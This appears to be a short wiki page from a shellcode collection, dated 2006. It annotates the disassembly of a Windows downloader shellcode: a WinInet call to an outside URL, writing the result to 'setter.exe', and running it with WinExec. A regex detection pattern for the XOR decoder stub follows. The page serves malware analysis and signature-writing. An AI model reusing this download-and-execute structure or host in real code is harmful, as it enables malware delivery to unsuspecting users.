00000566 aGlobalalloc    db 'GlobalAlloc',0      ; -> slot 5F0h
00000572 aWininet_dll    db 'WININET.DLL',0      ; LoadLibraryA argument (loop 2 module)
0000057E aInternetopena  db 'InternetOpenA',0    ; -> slot 614h
0000058C aInternetopenur db 'InternetOpenUrlA',0 ; -> slot 610h
0000059D aInternetreadfi db 'InternetReadFile',0 ; -> slot 60Ch
000005AE aHttpSc_virtual db 'http://sc.virtualgamez-zone.com/cgi-bin/cgi_proxy?ldr2',0 ; agent string, URL, and (first 4 bytes) bytes-read scratch
000005E5 aSetter_exe     db 'setter.exe',0       ; dropped file name, also the WinExec command line
; --- import table 5F0h..617h: 88888888h placeholders overwritten with GetProcAddress results; addressed as [ebp+N] with ebp = 5EFh.
000005F0 GlobalAlloc     dd 88888888h            ; ebp+01
000005F4 ExitProcess     dd 88888888h            ; ebp+05
000005F8 WinExec         dd 88888888h            ; ebp+09
000005FC _lclose_0       dd 88888888h            ; ebp+0D (never called)
00000600 _lclose         dd 88888888h            ; ebp+11
00000604 _lwrite         dd 88888888h            ; ebp+15
00000608 _lcreat         dd 88888888h            ; ebp+19
0000060C InternetReadFile dd 88888888h           ; ebp+1D
00000610 InternetOpenURLA dd 88888888h           ; ebp+21
00000614 InternetOpenA   dd 88888888h            ; ebp+25

shellcode patterns

xor

"(.*)(\\x33\\xC0\\xF7\\xD0\\x8B\\xFC\\xF2\\xAF\\x57\\x33\\xC9\\xB1(.)\\x90\\x90\\x90\\x90\\x80\\x37(.)\\x47"
"\\xE2\\xFA.*\\xFF\\xFF\\xFF\\xFF)(.*)$",
 
csni/shellcodes/rosengarten.txt · Last modified: 2006/02/17 14:01
 